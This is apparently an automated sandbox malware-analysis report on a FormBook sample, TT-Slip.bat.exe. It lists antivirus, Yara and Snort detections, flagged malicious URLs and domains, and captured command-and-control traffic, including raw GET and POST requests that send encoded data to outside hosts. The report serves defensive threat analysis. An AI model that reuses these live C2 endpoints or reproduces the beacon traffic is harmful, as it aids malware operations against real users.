Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	Avira URL Cloud: Label: malware
Source: https://shahaf3d.com/wp-admin/admin-ajax.php	Avira URL Cloud: Label: malware
Source: http://www.93v0.com/hcaw/	Avira URL Cloud: Label: malware
Source: http://www.shahaf3d.com/0a9p/?aN6=3TWTWTzxVTU&I2ID3h=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SdTcO7d1UbA68KXQq7mwut3Hj5agfoSiSpP8q1JtrU0Uptw==	Avira URL Cloud: Label: malware
Source: http://www.93v0.com/hcaw/?aN6=3TWTWTzxVTU&I2ID3h=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNuXrL2/4+zEPMpu7c25bMsodP4e1eE2n/p2tEGurmvoeYLA==	Avira URL Cloud: Label: malware
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	Avira URL Cloud: Label: malware
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/css/animate.min.css	Avira URL Cloud: Label: malware
Source: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	Avira URL Cloud: Label: malware
Source: http://www.shahaf3d.com/0a9p/	Avira URL Cloud: Label: malware
Source: https://shahaf3d.com	Avira URL Cloud: Label: malware
Source: http://www.931951.com/2ha1/?aN6=3TWTWTzxVTU&I2ID3h=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2MGDyrphp7y0SUfwCG55tOna8TREqvQmgePUorTaqhIxnZg==	Avira URL Cloud: Label: malware

Multi AV Scanner detection for domain / URL

Source: shahaf3d.com	Virustotal: Detection: 7%	Perma Link
Source: futuregainers.net	Virustotal: Detection: 8%	Perma Link
Source: www.931951.com	Virustotal: Detection: 7%	Perma Link
Source: srripaspocon.org	Virustotal: Detection: 6%	Perma Link
Source: www.torentreprenad.com	Virustotal: Detection: 9%	Perma Link
Source: www.srripaspocon.org	Virustotal: Detection: 11%	Perma Link
Source: www.navigate-power.boats	Virustotal: Detection: 10%	Perma Link
Source: www.futuregainers.net	Virustotal: Detection: 8%	Perma Link
Source: www.againbeautywhiteskin.asia	Virustotal: Detection: 5%	Perma Link
Source: www.shahaf3d.com	Virustotal: Detection: 6%	Perma Link
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.	Virustotal: Detection: 6%	Perma Link
Source: http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2	Virustotal: Detection: 6%	Perma Link
Source: https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

ReversingLabs: Detection: 50%

Multi AV Scanner detection for submitted file

Source: TT-Slip.bat.exe	ReversingLabs: Detection: 50%
Source: TT-Slip.bat.exe	Virustotal: Detection: 40%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.TT-Slip.bat.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2375891117.00000000015D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514397970.0000000002BD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.4517126416.0000000005130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514322449.0000000002B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4514041725.0000000002900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2375025408.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2376998691.0000000001AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4515341375.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TT-Slip.bat.exe

Joe Sandbox ML: detected

Source: TT-Slip.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: TT-Slip.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: compact.pdbGCTL source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4514950103.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ISsofSsdrAsp.exe, 00000010.00000000.2300784640.000000000084E000.00000002.00000001.01000000.0000000D.sdmp, ISsofSsdrAsp.exe, 00000012.00000002.4514440138.000000000084E000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: wntdll.pdbUGP source: TT-Slip.bat.exe, 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.0000000003190000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.000000000332E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2375273108.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2377019093.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: TT-Slip.bat.exe, TT-Slip.bat.exe, 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.0000000003190000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000002.4515629047.000000000332E000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2375273108.0000000002E21000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 00000011.00000003.2377019093.0000000002FDE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compact.pdb source: TT-Slip.bat.exe, 00000009.00000002.2375460605.0000000001108000.00000004.00000020.00020000.00000000.sdmp, ISsofSsdrAsp.exe, 00000010.00000002.4514950103.0000000000A6E000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 4x nop then jmp 06B38FD3h		0_2_06B39405
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Code function: 4x nop then jmp 07C0828Bh		10_2_07C086BD

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49715 -> 195.35.39.119:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49715 -> 195.35.39.119:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49717 -> 162.241.2.254:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49718 -> 162.241.2.254:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49720 -> 162.241.2.254:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49720 -> 162.241.2.254:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49721 -> 185.137.235.125:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49722 -> 185.137.235.125:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49724 -> 185.137.235.125:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49724 -> 185.137.235.125:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49725 -> 64.46.118.35:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49726 -> 64.46.118.35:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49728 -> 64.46.118.35:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49728 -> 64.46.118.35:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49729 -> 54.179.173.60:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49730 -> 54.179.173.60:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49732 -> 54.179.173.60:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49732 -> 54.179.173.60:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49733 -> 162.0.213.94:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49734 -> 162.0.213.94:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49736 -> 162.0.213.94:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49736 -> 162.0.213.94:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49737 -> 172.82.177.221:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49738 -> 172.82.177.221:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49740 -> 172.82.177.221:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49740 -> 172.82.177.221:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49741 -> 15.204.0.108:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49742 -> 15.204.0.108:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49744 -> 15.204.0.108:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49744 -> 15.204.0.108:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49745 -> 194.9.94.86:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49746 -> 194.9.94.86:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49748 -> 194.9.94.86:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49748 -> 194.9.94.86:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49749 -> 35.214.235.206:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49750 -> 35.214.235.206:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49752 -> 35.214.235.206:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49752 -> 35.214.235.206:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49753 -> 18.178.206.118:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49754 -> 18.178.206.118:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49756 -> 18.178.206.118:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49756 -> 18.178.206.118:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49757 -> 66.96.162.149:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49758 -> 66.96.162.149:80
Source: Traffic	Snort IDS: 2844299 ETPRO TROJAN MSIL/Juliens Botnet User-Agent 192.168.2.5:49760 -> 66.96.162.149:80
Source: Traffic	Snort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.5:49760 -> 66.96.162.149:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.lenovest.xyz

Source: Joe Sandbox View	IP Address: 194.9.94.86 194.9.94.86
Source: Joe Sandbox View	IP Address: 162.0.213.94 162.0.213.94

Source: Joe Sandbox View	ASN Name: MTSRU MTSRU
Source: Joe Sandbox View	ASN Name: LOOPIASE LOOPIASE
Source: Joe Sandbox View	ASN Name: SELECTELRU SELECTELRU
Source: Joe Sandbox View	ASN Name: ACPCA ACPCA

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+Wm9/sLy/+6kwKxmizhSXMLRmEd0k89wM5PzrnuS1OcOQUw==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.futuregainers.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /41br/?aN6=3TWTWTzxVTU&I2ID3h=65BU6tOk0p5LPOIIq5f29seWsrYdgC5c7tuB1xkwgoR5MWDkLOQgx5fJDEvOf4AlMkoVXixJXV15AbOmLh5rYjy1JJSSd8gZV48OK5h4nt3TyfM9xWMZVLxRvlpiI2JcoA== HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4mpz/?I2ID3h=Y+s3rA3a2LtNoPwWBpgaIhZOwJKcGGwPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4VugnDmL18sFLFtZPCU1s7f3MGpNHQZhMMTSljGkpJqnZygw==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.klimkina.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /0a9p/?aN6=3TWTWTzxVTU&I2ID3h=V8kIBUO99PR2h3hxIilGCb7xaYAlhXctAHbGwYfDKyusvK4qrRX5UHKQt8cO5YQS4wmk4tmPPEFmQcKp7F6SdTcO7d1UbA68KXQq7mwut3Hj5agfoSiSpP8q1JtrU0Uptw== HTTP/1.1Host: www.shahaf3d.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /3h10/?I2ID3h=9mZLXJL8GvO5ODxbtOpJ+rtZ6f1lqm3xC+OCFBImS8kNzrmbjyRfioF27F6qemRmHzSdXM7CT4wlEWpleIDtBRN5P/YRXsr4vMZ6FVLxfHeIGNVk4/Pc6j/1s70JI4NHtA==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.againbeautywhiteskin.asiaAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /e20q/?I2ID3h=WPritX3A9R+ySLDHKkvQUC0K3y08yWvw5+tRT3chZ2wpNsEUE7uyewm5xlmwIO2sKs7uf3/86JENB8xtRbvRN4bGZF5mTK/2R7/0SECzHSrPiKfzVgxr4RzAam04Uo8fzA==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.lenovest.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /2ha1/?aN6=3TWTWTzxVTU&I2ID3h=r6q+x3A/FEQLw6gmNICl4m79J6xGYnb4MeLNvFaSJRcJ7hS0Yil9+YspC9bp8TGkQ6fd6C5Pq3eWOBjFGqN2MGDyrphp7y0SUfwCG55tOna8TREqvQmgePUorTaqhIxnZg== HTTP/1.1Host: www.931951.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /egr4/?I2ID3h=OombhWzhkCuNqFAQBgJWCTIe5Ku7zRL7Rc3Pxm83mLxAAziOmqPFMSLkiV9xX+4t83HRZJys59Cvhm/US+qCyQrh5sl2ntzzWgXRuNaMR0672puaeGZqUZ0nGfY4wTYgtA==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.srripaspocon.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /r45o/?I2ID3h=gzu5VRbRlKcxtienrOg/vYWmVRq4TNxrFroidVFNmLFBxOvIucJSpLXaDw+Y+myNYDD7xGaCks3CSH70SMI2ulftPanOXvGI3UspsimcWApbI+/t5L5iOpVxhoCh3AVdsA==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.torentreprenad.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /4iea/?aN6=3TWTWTzxVTU&I2ID3h=LPPTutp79E4NI/FTL4slzgCz9Mw5fMldsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp4zucdPe+KsM3p1oNwK6FzAkB3R3BpNYPETyLQ+W6Q8ZNIg== HTTP/1.1Host: www.grecanici.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /hcaw/?aN6=3TWTWTzxVTU&I2ID3h=Xa5/huFy8Eck4v8ee+xdjh1i7ba8Clp/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNuXrL2/4+zEPMpu7c25bMsodP4e1eE2n/p2tEGurmvoeYLA== HTTP/1.1Host: www.93v0.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
Source: global traffic	HTTP traffic detected: GET /mjuo/?I2ID3h=GUK7oVIRF3FAoVisjIpZqa7HO+54FDT9CfoAB53ViUuzbZ1TAtWa7LnCzENP06w/wd6reHxcMz42RIoq6sWsnaQUI6Xonsfl1/2Pr0gDDe9u92eKgSNgaya45CSuU3/+xA==&aN6=3TWTWTzxVTU HTTP/1.1Host: www.leadchanges.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko

Source: ISsofSsdrAsp.exe, 00000012.00000002.4515468703.00000000038BE000.00000004.00000001.00040000.00000000.sdmp

String found in binary or memory: Content-Security-Policy: upgrade-insecure-requests; default-src data: 'unsafe-inline' 'unsafe-eval' https:; script-src data: 'unsafe-inline' 'unsafe-eval' https: blob: https://www.googleanalytics.com https://www.google-analytics.com https://www.googleoptimize.com https://optimize.google.com https://td.doubleclick.net https://fburl.com https://www.facebook.com https://connect.facebook.net; style-src data: 'unsafe-inline' https: https://optimize.google.com https://fonts.googleapis.com https://w.ladicdn.com https://s.ladicdn.com; img-src data: https: blob: android-webview-video-poster: https://www.google-analytics.com https://www.googletagmanager.com https://optimize.google.com https://w.ladicdn.com https://s.ladicdn.com; font-src data: https: https://fonts.gstatic.com https://w.ladicdn.com https://s.ladicdn.com; connect-src https: wss: blob:; media-src data: https: blob:; object-src https:; child-src https: data: blob:; form-action https:; frame-ancestors https://popupx.ladi.me https://*.ladi.me https://s.ladicdn.com https://g.ladicdn.com https://w.ladicdn.com https://*.ladicdn.com https://www.facebook.com https://*.facebook.com equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: www.fr2e4o.cfd
Source: global traffic	DNS traffic detected: DNS query: www.futuregainers.net
Source: global traffic	DNS traffic detected: DNS query: www.shopnow321.online
Source: global traffic	DNS traffic detected: DNS query: www.klimkina.pro
Source: global traffic	DNS traffic detected: DNS query: www.shahaf3d.com
Source: global traffic	DNS traffic detected: DNS query: www.againbeautywhiteskin.asia
Source: global traffic	DNS traffic detected: DNS query: www.homeppower.com
Source: global traffic	DNS traffic detected: DNS query: www.lenovest.xyz
Source: global traffic	DNS traffic detected: DNS query: www.931951.com
Source: global traffic	DNS traffic detected: DNS query: www.srripaspocon.org
Source: global traffic	DNS traffic detected: DNS query: www.x5hh186z.skin
Source: global traffic	DNS traffic detected: DNS query: www.torentreprenad.com
Source: global traffic	DNS traffic detected: DNS query: www.grecanici.com
Source: global traffic	DNS traffic detected: DNS query: www.navigate-power.boats
Source: global traffic	DNS traffic detected: DNS query: www.93v0.com
Source: global traffic	DNS traffic detected: DNS query: www.leadchanges.info

Source: unknown

HTTP traffic detected: POST /41br/ HTTP/1.1Host: www.shopnow321.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedCache-Control: no-cacheContent-Length: 207Origin: http://www.shopnow321.onlineReferer: http://www.shopnow321.online/41br/User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like GeckoData Raw: 49 32 49 44 33 68 3d 33 37 70 30 35 5a 32 48 6a 6f 4d 6f 41 65 68 44 73 72 79 72 34 66 47 6b 71 2f 63 72 32 69 6c 56 31 4f 6d 50 36 78 6c 6b 6a 65 67 55 63 48 37 63 54 36 46 4c 77 72 76 52 5a 30 37 79 58 74 63 6c 4b 68 51 74 50 78 59 78 54 42 77 6b 53 61 79 65 49 53 30 7a 51 79 57 43 4a 72 75 36 42 71 78 5a 51 4a 74 4c 58 35 46 50 75 63 50 58 36 76 5a 46 39 54 64 37 58 35 63 64 6e 79 5a 72 53 58 51 34 7a 38 7a 75 66 73 63 47 44 67 38 34 5a 68 43 59 6e 34 35 35 4c 4e 48 65 79 77 6e 4d 76 42 48 31 63 4a 76 63 4e 36 52 73 36 55 43 68 53 50 57 7a 41 5a 77 2b 59 46 71 49 6e 30 2b 51 47 54 66 6d 65 6b 35 41 32 6f 59 3d Data Ascii: I2ID3h=37p05Z2HjoMoAehDsryr4fGkq/cr2ilV1OmP6xlkjegUcH7cT6FLwrvRZ07yXtclKhQtPxYxTBwkSayeIS0zQyWCJru6BqxZQJtLX5FPucPX6vZF9Td7X5cdnyZrSXQ4z8zufscGDg84ZhCYn455LNHeywnMvBH1cJvcN6Rs6UChSPWzAZw+YFqIn0+QGTfmek5A2oY=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 30 May 2024 13:02:10 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeLast-Modified: Mon, 03 Oct 2022 20:19:07 GMTAccept-Ranges: bytesVary: Accept-EncodingContent-Encoding: gzipContent-Length: 836Content-Type: text/htmlData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 92 cd 6e db 46 10 c7 ef 05 f2 0e 1b 9e bd a2 65 45 1f 2e 48 01 a9 e3 3a bd 24 41 9b 00 ed a9 58 2d 47 e4 a0 bb 3b cc ee 90 92 fb 36 46 0e 05 0a f4 29 f4 62 5d da b2 4d 2a 4e 0b c7 39 50 9a e1 cc fc 66 fe 9c c9 9e bf 7a 7b f6 fe b7 77 e7 a2 62 6b 96 cf be cb ba 7f 61 94 2b f3 a4 66 f9 c3 cf 49 7c 29 44 56 81 2a ae ad 68 5b 60 25 74 a5 7c 00 ce 93 0f ef 7f 94 8b 64 10 ab 98 6b 09 1f 1b 6c f3 e4 57 f9 e1 a5 3c 23 5b 2b c6 95 81 44 68 72 0c 2e 16 fe 74 9e 43 51 c2 b0 d4 29 0b 79 d2 22 6c 6a f2 dc cb de 60 c1 55 5e 40 8b 1a e4 b5 73 24 d0 21 a3 32 32 68 65 20 1f 3f 44 5a 93 b7 8a 65 01 0c 9a 91 5c 8f c8 60 a0 ae c8 41 ee e8 a1 52 4f 2b e2 d0 2b 70 84 ae 80 ed 5d 2e 23 1b 58 be a6 50 43 a1 4a b0 a2 00 f1 0b 32 c4 0a 2b 5e 91 dd fd e3 90 c4 85 df 5d 31 06 21 45 cc e4 0b c5 e4 b3 f4 a6 74 cf 31 e8 fe 10 1e 4c 9e 84 2a 8a d6 0d 0b d4 dd a8 95 87 75 9e a4 ba 44 19 2e 43 8a 36 76 09 e9 5a b5 5d f8 ce 18 c5 9f e4 73 d6 63 10 72 72 32 aa 5d 99 88 80 7f 42 c8 93 c9 c9 76 72 f2 54 e6 74 3e 60 4e e7 db e9 fc a9 cc f9 6c c0 9c cf b6 f3 d9 53 99 a7 43 e6 e9 6c 7b fa 64 e6 f8 64 31 80 46 7f 1b 9f 07 b0 5f b5 72 39 